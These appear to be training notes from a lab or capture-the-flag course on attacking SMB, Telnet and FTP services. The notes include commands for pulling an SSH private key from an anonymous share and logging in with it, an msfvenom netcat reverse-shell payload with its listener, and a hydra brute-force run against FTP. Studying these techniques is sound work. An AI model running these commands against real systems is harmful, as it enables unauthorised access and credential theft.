# Blue Team Training Series Part 1 ###### tags: `cybersecurity` `blue team` `smb` `telnet` `ftp` `hydra` ## Understanding SMB Server Message Block protocol is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network. SMB is a request-response protocol meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using NETBIOS over TCP/IP(RFC 1001, and 1002), NetBEUI (netbios extended user interface) or IPX/SPX (internetwork packet exchange / sequenced packet exchange) Once a connection is established, clients send commands (SMBs) to the server allowing them to access shares, open files, read and write files, or anything else you'd do with a file system. Microsoft Windows >=95 have rolled out with support for SMB. **Samba** is the open source alternative for *nix systems ## Enumerating SMB Enumeration is the process of **gathering information** on a target in order to **find potential attack vectors** and aid in **exploitation**. Enumeration is useful for gathering username, passwords, network info, host names, app data, services etc so long as it is useful to an attacker. Typically there are SMB sharedrives on a server that can be connected to and used to view or transfer files. ### Steps: 1. Port Scanning : using nmap 2. Enum4linux Tool used to enumerate SMB shares on both windows and linux systems. It is a wrapper around the tools in the samba package and makes it easy to quickly extract information from the target pertaining to smb. **syntax: enum4linux [options] [ip]** Common shares include: * netlogon * profiles * print$ * IPC$ At times the best way into a system is due to security misconfigurations in the system. For SMB, that could be exploiting anonymous SMB share access, a common misconfiguration that could allow us to gain information that would lead to a shell. From our enumeration stage we know: * The smb share location * The name of an interesting smb share ## And the winner is... smbclient Because we are trying to access an SMB share, we need a client to access resources on a server. Let's use smbclient because it's part of the default samba suite. **syntax: smbclient //[IP]/[SHARE]** followed by the tags: -U [name]: to specify the user (for anonymous use: Anonymous) -p [port]: to specify the port (default is 445) #### consider: * use the get command to download files while in smbclient * in the case of ssh, you can find the private key in the .ssh directory: it's usually named id_rsa * **get id_rsa** (downloads the key) * once you figure out the identity of the user e.g john doe * you can ssh into the system using: * **ssh -i id_rsa johndoe@ip** * then you go from there ## Understanding Telnet Telent is an application protocol allowing you through a telnet client to connect and issue commands to a remote machine hosting a telnet server. The telnet client will establish a connection with the server. The client then becomes a virtual terminal allowing you to interact with the remote host. Since Telnet sends messages in clear text and doesn't have specific security mechanisms associated with it, ssh is used as its replacement. **syntax: telnet [ip] [port]** Vulnerabilities that could potentially be trivial to exploit do not always jump out at us. Therefore, we need to be thorough in our methodology. You can check for telnet's CVEs at: [cvedetails.com](https://www.cvedetails.com/) [cve.mitre.org](https://cve.mitre.org/) A CVE (Common Vulnerabilities and Exposures) is a list of publicly disclosed computer security flaws. Keep in mind, that you are far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow you to exploit it. ### The name is shell.. Reverse shell * A **shell** is a **piece of code / program that can be used to gain code execution or command execution on a device**. * A **reverse** shell is a type of shell in which the **target machine communicates back to the attacking machine**. * The **attacking machine** has a **listening port** on which it **receives the connection**, resulting in code or command execution being achieved. #### listen and listen good ... with tcp * setup a tcp listener on your local machine with * **syntax: tcpdump ip proto \\icmp -i tun0** note that this is literally 'ip' and not an address * to see the output of the commands from the telnet session ### Get that payday with that msfvenom payload This will generate and encode a netcat reverse shell. **syntax: msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R** * -p : payload * lhost : our local host ip address * lport : the port to listen on * R : export the payload in raw format start a netcat listener on our local machine syntax: **nc -lvp [listening port]** Once you're listening, copy and paste the payload into the telnet terminal and you have a reverse shell :-) ## Understanding FTP File Transfer Protocol is used to allow remote transfer of files over a network. It utilises a **client-server model** to do this and relays data and commands in a very efficient way. A typical Ftp session operates using two channels: * a command: sometimes called the control channel * a data channel The command channel is for transmitting commands as well as replies to said commands. The data channel is for transmitting data. Ftp operates using a **client-server protocol**. The **client initiates a connection** with the server, the **server validates** whatever login credentials are provided and **then opens** the session. While the session is open, the client may execute commands on the server. Servers support **Active or passive connections or both** **Active FTP**: the client opens a port and listens. The **server** is required to **actively connect** to it. **Passive FTP**: the **server** opens a port and **listens passively** and the client connects to it. The separation of command and data channels allow for sending commands to the server without having to wait for data transfer to finish. Exploiting anonymous ftp login to see what files we can access and if the info can lead to a shell is a common ctf method and mimics a real life careless implementation of an ftp server. A common legacy exploit utilizing in.ftpd can be found here [Solaris 2.6/7.0 - IN.FTPD CWD 'Username' Enumeration](https://www.exploit-db.com/exploits/20745) To check for anonymous ftp login: syntax: **ftp [ip]** and enter **anonymous** and no password when prompted. ## Exploiting FTP When using FTP both the command and data channels are unecrypted. Data sent over these channels can be intercepted and read. You could use ARP-Poisoning to trick a victim into sending sensitive information to an attacker instead of a legitimate source. See related article [here.](https://www.jscape.com/blog/bid/91906/Countering-Packet-Sniffers-Using-Encrypted-FTP) ## Enter HYDRA Hydra is a very fast online password cracking tool which can perform rapid dictionary attacks against more than 50 protocols including telnet, rdp, ssh, ftp, http, smb, several dbs and more. syntax:**hydra -t 4 -l naruto -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp** * hydra: runs hydra * -t 4: number of parallel connections per target * -l [user]: points to the user whose account you are trying to compromise * -P: [path to dictionary]: Points to the file containing the list of possible passwords * -vV: set verbose mode to very verbose * [machine ip]: the ip address of the target machine * ftp/protocol: sets the protocol You can read more about exploitation of remote services [here](https://attack.mitre.org/techniques/T1210/)